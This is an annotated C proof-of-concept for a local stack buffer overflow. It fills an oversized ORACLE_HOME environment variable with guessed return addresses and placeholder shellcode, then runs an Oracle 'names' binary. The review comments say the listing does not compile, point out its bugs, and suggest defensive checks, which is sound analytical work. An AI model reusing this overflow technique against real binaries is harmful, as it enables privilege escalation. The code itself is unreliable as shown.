/*
 * Proof-of-concept listing: builds an 800-byte value for the ORACLE_HOME
 * environment variable and then runs the binary at PATH with that environment.
 *
 * As extracted, the listing is incomplete: the header names after both
 * #include directives are missing, NOP is never defined, and `shellcode`
 * holds only a placeholder string. It does not compile as shown.
 *
 * NOTE(review): the target's source is not on this page. Presumably it copies
 * ORACLE_HOME into a fixed-size stack buffer without a length check -- confirm
 * against the vendor advisory. On the defensive side, the relevant controls
 * are length validation of environment-derived strings in the target, and
 * monitoring for ORACLE_HOME values that are hundreds of bytes long or contain
 * non-path bytes.
 */
#include
#include
#define BUFFER 800
#define PATH "/hackerslab/loveyou/oracle/8.1.5/bin/names"

/* Placeholder only (German for "usual shellcode"); no payload bytes are given. */
char shellcode[] = "üblicher Shellcode";

/*
 * Copies the stack pointer into %eax via inline assembly.
 * There is no `return` statement: the caller receives a value only because
 * %eax is the return register in the 32-bit x86 calling convention. In
 * standard C, using the result of a non-void function that falls off its end
 * is undefined behavior.
 */
unsigned long getesp(void) {
    __asm__("movl %esp,%eax");
}

/*
 * argv[1] (optional): integer offset subtracted from the guessed address.
 * No return statement at the end; the result of system() is ignored.
 */
int main(int argc, char *argv[]) {
    /* binary[120] is declared but never used in this listing. */
    char *buff, *ptr,binary[120];
    long *addr_ptr, addr;
    int bsize=BUFFER;
    int i,offset;

    offset = 0 ;
    /* atoi() reports no errors; a non-numeric argument silently becomes 0. */
    if ( argc > 1 ) offset = atoi(argv[1]);

    /* The malloc() result is not checked before use. */
    buff = malloc(bsize);

    /*
     * Address guess: this process's own stack pointer minus a hard-coded
     * constant. This only holds if stack addresses are the same from one
     * process to the next; address-space randomization removes that assumption.
     */
    addr = getesp() - 5933 - offset;
    ptr = buff;
    addr_ptr = (long *) ptr;

    /*
     * Fills the buffer with repeated copies of addr. The i+=4 stride assumes
     * sizeof(long) == 4; where long is 8 bytes, the same loop would write past
     * the 800-byte allocation.
     */
    for (i = 0; i < bsize; i+=4) *(addr_ptr++) = addr;

    /*
     * NOTE(review): memset takes (dest, value, count). As written, the value
     * argument is bsize/2 and the count argument is NOP, which is not defined
     * anywhere in this listing.
     */
    memset(buff,bsize/2,NOP);

    /* Copies the shellcode array so that it is centered at the buffer midpoint. */
    ptr = buff + ((bsize/2) - (strlen(shellcode)/2));
    for (i = 0; i < strlen(shellcode); i++) *(ptr++) = shellcode[i];

    /* NUL-terminate so the buffer can be passed to setenv() as a C string. */
    buff[bsize - 1] = '\0';

    /* The third argument, 1, overwrites any existing ORACLE_HOME value. */
    setenv("ORACLE_HOME",buff,1);

    /* Format mismatch: %d is given a size_t (strlen) and %x is given a long. */
    printf("[ offset:%d buffer=%d ret:0x%x ]\n", offset,strlen(buff),addr);

    /* Runs the target through the shell; it inherits the modified environment. */
    system(PATH);
}